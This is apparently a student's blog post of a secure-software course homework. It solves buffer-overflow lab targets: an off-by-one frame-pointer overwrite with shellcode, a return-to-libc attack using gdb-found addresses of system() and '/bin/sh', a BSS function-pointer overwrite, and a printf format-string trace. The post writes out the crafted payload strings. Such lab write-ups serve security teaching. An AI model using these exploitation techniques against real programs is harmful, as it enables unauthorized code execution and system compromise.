<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="sws," />










<meta name="description" content="Submission03 of SWSXusong Wang 3375907Huicheng Qian 3443114Shkodran Abdullahu 3466256 Considering the data on the buffer is generated by sof-exploit-reverse-exploit and unchangable, and the argv[1] wh">
<meta property="og:type" content="article">
<meta property="og:title" content="Submission03 of SWS">
<meta property="og:url" content="http://yoursite.com/2020/05/15/SWS/Submission03/index.html">
<meta property="og:site_name" content="Seven&#39;s blog">
<meta property="og:description" content="Submission03 of SWSXusong Wang 3375907Huicheng Qian 3443114Shkodran Abdullahu 3466256 Considering the data on the buffer is generated by sof-exploit-reverse-exploit and unchangable, and the argv[1] wh">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589555954/sws-homework-03-page-002_avhnuq.jpg">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589563791/p1-2_jn8nv2.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589563492/p1_i3bjob.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589555953/sws-homework-03-page-003_e7d1fq.jpg">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589587744/Screenshot_2020-05-16_02-07-54_jic9un.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589588117/Screenshot_2020-05-16_02-14-55_okxth7.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589625612/Screenshot_2020-05-16_12-39-35_wi2ou0.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648099/Screenshot_2020-05-16_18-54-38_h4tm9a.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648770/Screenshot_2020-05-16_19-04-19_o7agqn.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648770/Screenshot_2020-05-16_19-04-41_nt97ux.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648770/Screenshot_2020-05-16_19-05-22_i06izw.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648770/Screenshot_2020-05-16_19-05-46_rt1h0t.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589625612/Screenshot_2020-05-16_12-39-43_h1pl8e.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589746300/1_coc2we.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589625612/Screenshot_2020-05-16_12-39-49_lgmewq.png">
<meta property="og:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589555953/sws-homework-03-page-005_dbn8nb.jpg">
<meta property="article:published_time" content="2020-05-15T08:44:09.000Z">
<meta property="article:modified_time" content="2020-05-17T20:30:02.683Z">
<meta property="article:author" content="Seven ♂">
<meta property="article:tag" content="sws">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589555954/sws-homework-03-page-002_avhnuq.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"right","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"bounceIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/05/15/SWS/Submission03/"/>





  <title>Submission03 of SWS | Seven's blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Seven's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/05/15/SWS/Submission03/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Seven ♂">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.JPG">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Seven's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Submission03 of SWS</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-05-15T10:44:09+02:00">
                2020-05-15
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/theory/" itemprop="url" rel="index">
                    <span itemprop="name">theory</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Submission03-of-SWS"><a href="#Submission03-of-SWS" class="headerlink" title="Submission03 of SWS"></a>Submission03 of SWS</h2><h2 id="Xusong-Wang-3375907"><a href="#Xusong-Wang-3375907" class="headerlink" title="Xusong Wang 3375907"></a>Xusong Wang 3375907</h2><h2 id="Huicheng-Qian-3443114"><a href="#Huicheng-Qian-3443114" class="headerlink" title="Huicheng Qian 3443114"></a>Huicheng Qian 3443114</h2><h2 id="Shkodran-Abdullahu-3466256"><a href="#Shkodran-Abdullahu-3466256" class="headerlink" title="Shkodran Abdullahu 3466256"></a>Shkodran Abdullahu 3466256</h2><p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589555954/sws-homework-03-page-002_avhnuq.jpg" alt=""></p>
<p>Considering the data on the buffer is generated by sof-exploit-reverse-exploit and unchangable, and the argv[1] which includes the return address is only 4 bytes, we need to design a stack, whose return address is able to surely covered by argv[1],  the easiest way to creat a code which meet the requirement successfully is shown below:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">foo</span> <span class="params">(<span class="keyword">char</span> *str)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">char</span> b[<span class="number">64</span>];</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"address of b[] is @ %08x\n"</span>,b);</span><br><span class="line">  <span class="built_in">strcpy</span>(b,str);  &#125;</span><br><span class="line">	<span class="comment">// put your code here</span></span><br></pre></td></tr></table></figure>

<p>A local variable with width 64bytes, which is followed the old frame poiter with 4 byte, could be just exploited by our sof-exploit-reverse-exploit.</p>
<img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589563791/p1-2_jn8nv2.png" alt="e" style="zoom:80%;" />

<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589563492/p1_i3bjob.png" alt=""></p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589555953/sws-homework-03-page-003_e7d1fq.jpg" alt=""></p>
<p>What we should do is that to change the value of the saved based pointer of function b, make it to point an address just one word below the location where start address of shellcode is.</p>
<img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589587744/Screenshot_2020-05-16_02-07-54_jic9un.png" alt="c" style="zoom:100%;" />

<p>According the known information:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Shellcode at: 0x80496c0</span><br><span class="line">Address of buffer in exploitable program: 0xbffff798</span><br><span class="line">Framepointer before copy: bffff7c8</span><br></pre></td></tr></table></figure>

<p>We change the  value of the saved based pointer of function b to 0xbffff798, where is the start address of buffer. Then we need to put start address of shellcode at 0xbffff79c, at last our construction string is shown as below</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">(<span class="built_in">echo</span> -e <span class="string">"aaaa\xc0\x96\x04\x08aaaaaaaaaaaaaaaaaaaaaaaa\x98"</span>)</span></span><br></pre></td></tr></table></figure>

<p>Got the shell.</p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589588117/Screenshot_2020-05-16_02-14-55_okxth7.png" alt=""></p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589625612/Screenshot_2020-05-16_12-39-35_wi2ou0.png" alt=""></p>
<p>From the previous problem, we are able to attack by using the return to libc. According to the previous explanation, since we already control the return address, we could assign the return address with the address of system function, and put the address of “bin/bash” at a distance of 4 bytes, the figure shown as below:</p>
<img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648099/Screenshot_2020-05-16_18-54-38_h4tm9a.png" alt="e" style="zoom:67%;" /> 

<p>By invoking the system function, we could pass ‘bin/bash’ to it as an argument, so we should construct our payload like this:     |dummy + address of system + dummy + address of “/bin/sh” + dummy|, but we still need to find out the address of “bin/sh” and  system.</p>
<ol>
<li><p>finding the ‘bin/sh’.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(gdb)b main</span><br><span class="line">(gdb)r</span><br><span class="line">(gdb)info proc map</span><br></pre></td></tr></table></figure>

<p>The address of ‘bin/sh’ should be between 0xb7e8f000 and 0xb7fd8000. Since ‘find’ is not available, we have to spent some time to find it manually(eg. x/10000s 0xb7e8f000) , finally it was found located at address 0xb7fbb3ce </p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648770/Screenshot_2020-05-16_19-04-19_o7agqn.png" alt=""></p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648770/Screenshot_2020-05-16_19-04-41_nt97ux.png" alt=""></p>
<p>address of “/bin/sh”  0xb7fbb3ce</p>
</li>
<li><p>finding address of system(), </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(gdb)b main</span><br><span class="line">(gdb)r</span><br><span class="line">(gdb)p system</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648770/Screenshot_2020-05-16_19-05-22_i06izw.png" alt=""></p>
<p>System address 0xb7ec7990</p>
</li>
<li><p>Construct our payload and get the shell.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">isuser@ubuntu:/mnt/homework03/p3$ ./obo-exploit-1-target   $(echo -e "aaaa\x90\x79\xec\xb7aaaa\xce\xb3\xfb\xb7aaaaaaaaaaaaaaaa\x98"&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589648770/Screenshot_2020-05-16_19-05-46_rt1h0t.png" alt=""></p>
</li>
</ol>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589625612/Screenshot_2020-05-16_12-39-43_h1pl8e.png" alt=""></p>
<p>Because error_handler points to the function of print_error ,buf[12] is in the BSS segment, which right next to the error_handler, we could overwrite the buf[12] and error_handler by designed payload , which starts with 12 times nop, then a address point to shell code, at last the shellcode, as below:</p>
<img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589746300/1_coc2we.png" alt="e" style="zoom:150%;" />

<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589625612/Screenshot_2020-05-16_12-39-49_lgmewq.png" alt=""></p>
<p><img src="https://res.cloudinary.com/dyiwocwmp/image/upload/v1589555953/sws-homework-03-page-005_dbn8nb.jpg" alt=""></p>
<p>| Step | printf-internal | printf-internal | Output    |<br>|      | loop pointer    | stack pointer   | up to now |<br>|——+—————–+—————–+—————-|<br>|    0 | 0812ff02        | bffff544        | (empty)       |<br>|    1 | 0812ff03        | bffff544        |    a              |<br>|    2 | 0812ff04        | bffff544        |    ab            |<br>|    3 | 0812ff05        | bffff544        |    abc          |<br>|    4 | 0812ff06        | bffff544        |    abc          |<br>|    5 | 0812ff07        | bffff548        |    abc66      |<br>|    6 | 0812ff08        | bffff548        |    abc66x    |<br>|    7 | 0812ff09        | bffff548        |    abc66xy  |<br>|    8 | 0812ff0a        | bffff548        |    abc66xy  |<br>|    9 | 0812ff0b        | bffff54c        |    abc66xyFoobar|</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sws/" rel="tag"># sws</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/14/SWS/SWS_Notes/" rel="next" title="SWS_Notes">
                <i class="fa fa-chevron-left"></i> SWS_Notes
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/05/15/SWS/Submission02/" rel="prev" title="Submission02 of SWS">
                Submission02 of SWS <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript" target="_blank" rel="noopener">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.JPG"
                alt="Seven ♂" />
            
              <p class="site-author-name" itemprop="name">Seven ♂</p>
              <p class="site-description motion-element" itemprop="description">Try harder</p>
          </div>

	<div id="music163player">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=120 src="//music.163.com/outchain/player?type=0&id=5004636762&auto=0&height=430"></iframe>
	</div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/FastG0at" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:st164478@stud.uni-stuttgart.de" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Submission03-of-SWS"><span class="nav-number">1.</span> <span class="nav-text">Submission03 of SWS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Xusong-Wang-3375907"><span class="nav-number">2.</span> <span class="nav-text">Xusong Wang 3375907</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Huicheng-Qian-3443114"><span class="nav-number">3.</span> <span class="nav-text">Huicheng Qian 3443114</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shkodran-Abdullahu-3466256"><span class="nav-number">4.</span> <span class="nav-text">Shkodran Abdullahu 3466256</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Seven ♂</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2020/05/15/SWS/Submission03/';
          this.page.identifier = '2020/05/15/SWS/Submission03/';
          this.page.title = 'Submission03 of SWS';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://disqus_eaniNzpdiO.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  














  





  

  

  

  
  

  

  

  

</body>
</html>
